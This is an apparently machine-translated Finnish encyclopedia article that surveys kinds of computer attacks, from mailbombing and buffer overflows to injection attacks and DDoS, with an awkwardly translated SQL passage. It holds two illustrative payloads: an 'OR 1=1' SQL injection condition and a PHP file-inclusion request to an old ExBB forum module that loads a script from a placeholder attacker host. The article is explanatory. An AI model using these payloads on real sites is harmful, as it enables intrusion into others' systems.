Hakkerin hyökkäys

Kokeneet kirjoittajat eivät ole vielä tarkistaneet sivun nykyistä versiota, ja se voi poiketa merkittävästi 14. lokakuuta 2017 tarkistetusta versiosta . tarkastukset vaativat 20 muokkausta .

Hakkerihyökkäys sanan suppeassa merkityksessä - tällä hetkellä ilmaus ymmärretään "hyökkäykseksi turvajärjestelmään", ja se tarkoittaa enemmän seuraavaa termiä Cracker attack . Tämä johtui sanan " hakkeri " merkityksen väärästä tulkinnasta.

Hakkerihyökkäys sanan laajassa merkityksessä (alkuperäinen merkitys) on aivoriihi, jonka tarkoituksena on löytää tapoja ratkaista monimutkaisia ​​ongelmia. Yksi tai useampi korkealuokkainen asiantuntija ( hakkerit ) voi osallistua hakkerihyökkäykseen. Aivoriihien tuloksena voidaan keksiä epätavanomaisia ​​menetelmiä ongelman ratkaisemiseksi tai optimoida olemassa olevia menetelmiä.

Cracker - hyökkäys  on toiminta, jonka tarkoituksena on kaapata etä-/paikallinen tietokonejärjestelmän hallinta (korostaa oikeuksia) tai horjuttaa se tai evätä palvelu.

Mailbombing ( SMTP )

Sitä pidetään vanhimpana hyökkäysmenetelmänä, vaikka sen olemus on yksinkertainen ja alkeellinen: suuri määrä sähköpostiviestejä tekee mahdottomaksi työskennellä postilaatikoiden ja joskus kokonaisten sähköpostipalvelimien kanssa . Tätä tarkoitusta varten on kehitetty monia ohjelmia, ja kokematonkin käyttäjä voi suorittaa hyökkäyksen määrittämällä vain uhrin sähköpostin , viestin tekstin ja tarvittavien viestien määrän. Monet tällaiset ohjelmat tekivät mahdolliseksi piilottaa lähettäjän todellisen IP-osoitteen käyttämällä anonyymiä postipalvelinta postitusta varten . Tätä hyökkäystä on vaikea estää, koska edes Internet-palveluntarjoajan sähköpostisuodattimet eivät pysty määrittämään todellista roskapostin lähettäjää . Palveluntarjoaja voi rajoittaa yhdeltä lähettäjältä tulevien sähköpostien määrää, mutta lähettäjän osoite ja aihe luodaan usein satunnaisesti .

Puskurin ylivuoto

Ehkä yksi yleisimmistä hyökkäyksistä Internetissä. Tämän hyökkäyksen periaate perustuu ohjelmistovirheiden käyttöön, jotka mahdollistavat muistirikkomuksen aiheuttamisen ja sovelluksen kaatumisen tai mielivaltaisen binäärikoodin suorittamisen sen käyttäjän puolesta, jolla haavoittuva ohjelma oli käynnissä. Jos ohjelma toimii järjestelmänvalvojan tilillä, tämän hyökkäyksen avulla voit saada täyden hallinnan uhrin tietokoneeseen, joten on suositeltavaa työskennellä tavallisen käyttäjän tilillä, jolla on rajoitetut oikeudet järjestelmään, ja suorittaa vain toimintoja, jotka vaativat järjestelmänvalvojan oikeudet järjestelmänvalvojan tilillä.

Virukset , troijalaiset , madot , snifferit , rootkitit ja muut erikoisohjelmat

Seuraava hyökkäystyyppi on kehittyneempi tapa päästä käsiksi turvaluokiteltuihin tietoihin - erityisohjelmien käyttö uhrin tietokoneella työskentelemiseen sekä edelleen jakelu (nämä ovat viruksia ja matoja). Tällaiset ohjelmat on suunniteltu etsimään ja siirtämään salaisia ​​tietoja omistajalleen tai yksinkertaisesti vahingoittamaan turvajärjestelmää ja uhrin tietokoneen suorituskykyä. Näiden ohjelmien toimintaperiaatteet ovat erilaiset.

Verkkoäly

Tällaisen hyökkäyksen aikana krakkausyksikkö ei todellisuudessa suorita mitään tuhoisaa toimintaa, mutta sen seurauksena se voi saada luottamuksellista tietoa uhrin tietokonejärjestelmän rakenteesta ja toimintaperiaatteista. Saatuja tietoja voidaan käyttää tulevan hyökkäyksen rakentamiseen pätevästi, ja se tehdään yleensä valmisteluvaiheessa.

Sellaisen tiedustelun aikana hyökkääjä voi suorittaa porttiskannauksen , DNS - kyselyitä , pingata avoimia portteja , välityspalvelinten läsnäoloa ja turvallisuutta . Tuloksena saat tietoa järjestelmässä olevista DNS-osoitteista, kuka ne omistaa, mitä palveluita niillä on saatavilla, kuinka paljon ulkopuolisten ja sisäisten käyttäjien pääsy näihin palveluihin on saatavilla.

Pakettien nuuskiminen

Se on myös melko yleinen hyökkäystyyppi, joka perustuu verkkokortin toimintaan promiscuous-tilassa sekä Wi -Fi-verkkojen monitorointitilaan . Tässä tilassa kaikki verkkokortin vastaanottamat paketit lähetetään käsiteltäviksi erityiseen sovellukseen, jota kutsutaan snifferiksi . Tämän seurauksena hyökkääjä voi hankkia suuren määrän palvelutietoja: kuka, mistä ja minne lähetti paketteja, minkä osoitteiden kautta nämä paketit kulkivat. Suurin vaara tällaisessa hyökkäyksessä on itse tietojen, kuten työntekijöiden käyttäjätunnusten ja salasanojen, hankkiminen, jolla voidaan päästä laittomasti järjestelmään yrityksen tavallisen työntekijän varjolla.

IP-huijaus

Myös yleinen hyökkäystyyppi riittämättömästi suojatuissa verkoissa, kun hyökkääjä teeskentelee olevansa valtuutettu käyttäjä, ollessaan itse organisaatiossa tai sen ulkopuolella. Tätä varten krakkauksen on käytettävä IP-osoitetta, joka on sallittu verkon turvajärjestelmässä. Tällainen hyökkäys on mahdollinen, jos turvajärjestelmä sallii käyttäjän tunnistamisen vain IP-osoitteen perusteella eikä vaadi lisävahvistuksia.

Man-in-the-Middle

Hyökkäystyyppi, jossa hyökkääjä kaappaa kahden järjestelmän välisen viestintäkanavan ja saa pääsyn kaikkiin lähetettyihin tietoihin. Saavuttaessaan pääsyn tälle tasolle, hyökkääjä voi muokata tietoja haluamallaan tavalla saavuttaakseen tavoitteensa. Tällaisen hyökkäyksen tarkoituksena on laittomasti hankkia, varastaa tai väärentää lähetettyjä tietoja tai päästä luvatta verkkoresursseihin. Tällaisia ​​hyökkäyksiä on erittäin vaikea jäljittää, koska hyökkääjä sijaitsee yleensä organisaation sisällä.

Koodin lisäys

Hyökkäysperhe, jota yhdistää yksi yhteinen periaate - hyökkäyksen seurauksena data suoritetaan koodina.

SQL-injektio  on hyökkäys, jossa tietokantaan tehtävien SQL -kyselyiden parametreja muutetaan. Tämän seurauksena pyyntö saa täysin erilaisen merkityksen, ja jos syötetietojen suodatus ei ole riittävä, se ei voi ainoastaan ​​näyttää luottamuksellisia tietoja, vaan myös muuttaa/poistaa tietoja. Hyvin usein tämän tyyppinen hyökkäys voidaan havaita esimerkiksi sivustoissa, jotka käyttävät komentoriviparametreja (tässä tapauksessa URL -muuttujia ) SQL-kyselyjen rakentamiseen tietokantoihin ilman asianmukaista vahvistusta [1] .

SELECT kenttälista FROM taulukosta WHERE id = 23 TAI 1=1;Tarkistamisen sijaan voit korvata väitteen
, joka, jos se on tosi , antaa sinun ohittaa tarkistuksen

PHP-injektio  on yksi tavoista hakkeroida PHP :llä toimivia verkkosivustoja . Se koostuu erityisesti muodostetun haitallisen komentosarjan lisäämisestä sivuston palvelinpuolen verkkosovelluskoodiin , mikä johtaa mielivaltaisten komentojen suorittamiseen. Tiedetään, että monissa Internetissä laajalle levinneissä ilmaisissa PHP-koneissa ja foorumeissa (useimmiten nämä ovat vanhentuneita versioita) on huonosti suunniteltuja moduuleja tai erillisiä rakenteita, joissa on haavoittuvuuksia. Crackerit analysoivat haavoittuvuuksia ei-escape-muuttujina, jotka saavat ulkoisia arvoja. Esimerkiksihakkerit käyttävät hyväkseen vanhaa ExBB- foorumin haavoittuvuutta pyynnöllä: GET /modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt.

Cross Site Scripting tai XSS ( lyhenne englannin  kielestä Cross Site Scripting , ei pidä sekoittaa CSS :ään ( Cascade Style Sheet )) on verkkosovelluksissa yleisesti löydetty haavoittuvuus, jonka avulla pahantahtoiset käyttäjät voivat pistää koodia muiden käyttäjien katselemille verkkosivuille. . Esimerkkejä tällaisista koodeista ovat HTML-koodi ja asiakaspuolen komentosarjat, yleisimmin JavaScript .

XPath-injektio  on eräänlainen haavoittuvuus, joka sisältää XPath -lausekkeiden lisäämisen alkuperäiseen pyyntöön XML - tietokantaan . Kuten muissakin injektiotyypeissä, haavoittuvuus on mahdollinen syötetietojen riittämättömän validoinnin vuoksi.

Automaattinen täyttö  on troijalaisten periaatteella toimiva verkkoinjektio, jonka päätarkoituksena on tunkeutua käyttäjän tilille maksujärjestelmässä , muuttaa tapahtumatietoja huomaamattomasti muokkaamalla HTML - koodia ja siirtää käyttäjän varat hyökkääjän tilille.

Sosiaalinen suunnittelu

Social engineering ( englanniksi  social engineering ) - henkilöstön epäpätevyyden, epäpätevyyden tai laiminlyönnin käyttö tiedon saamiseksi. Tätä menetelmää käytetään yleensä ilman tietokonetta tavallisen puhelimen tai sähköpostin avulla. Tällä tavalla saadaan yleensä monenlaista tietoa. Hyökkäyksen aikana hyökkääjä ottaa yhteyttä uhriin ja yrittää harhaanjohtavasti tai luottamusta saavuttaen hankkia tarvittavia tietoja, joita on vaikea saada muulla tavalla tai muut keinot ovat riskialttiimpia.

Palvelunesto

DoS ( englanniksi.  Denial of Service  - Denial of Service) - hyökkäys, jonka tarkoituksena on saada palvelin olemaan vastaamatta pyyntöihin. Tämäntyyppiseen hyökkäykseen ei liity salaisten tietojen hankkimista, mutta joskus siitä on apua muiden hyökkäysten alustamisessa. Esimerkiksi jotkin ohjelmat voivat koodivirheiden vuoksi aiheuttaa poikkeuksia , ja kun palvelut on poistettu käytöstä, ne voivat suorittaa hyökkääjän toimittamaa koodia tai tulvahyökkäyksiä, kun palvelin ei pysty käsittelemään valtavaa määrää saapuvia paketteja.

DDoS ( englanniksi  Distributed Denial of Service  - Distributed DoS) on DoS-hyökkäyksen alatyyppi, jolla on sama tavoite kuin DoS:llä, mutta se ei ole tehty yhdestä tietokoneesta, vaan useista verkon tietokoneista. Tämän tyyppisissä hyökkäyksissä käytetään joko palvelun epäämiseen johtavien virheiden esiintymistä tai suojauksen toimintaa, mikä johtaa palvelun toiminnan estoon ja sen seurauksena myös palvelun estämiseen. DDoS:ää käytetään silloin, kun tavallinen DoS on tehoton. Tätä varten useita tietokoneita yhdistetään, ja jokainen suorittaa DoS-hyökkäyksen uhrin järjestelmään. Yhdessä tätä kutsutaan DDoS-hyökkäykseksi. Bottiverkon koko voi vaihdella useista kymmenistä useisiin satoihin tuhansiin tietokoneisiin.

Mikä tahansa hyökkäys ei ole muuta kuin yritystä käyttää uhrin turvajärjestelmän epätäydellisyyttä joko tiedon hankkimiseen tai järjestelmän vahingoittamiseen, joten onnistuneen hyökkäyksen syynä on krakkauksen ammattitaito ja tiedon arvo sekä turvajärjestelmän ylläpitäjän osaamisen puute , erityisesti ohjelmistojen epätäydellisyys ja riittämätön huomio turvallisuusasioissa koko yrityksessä.

Katso myös

Muistiinpanot

  1. Esimerkin SQL-injektiohyökkäykset Arkistoitu 7. marraskuuta 2015 Wayback Machinessa 

Linkit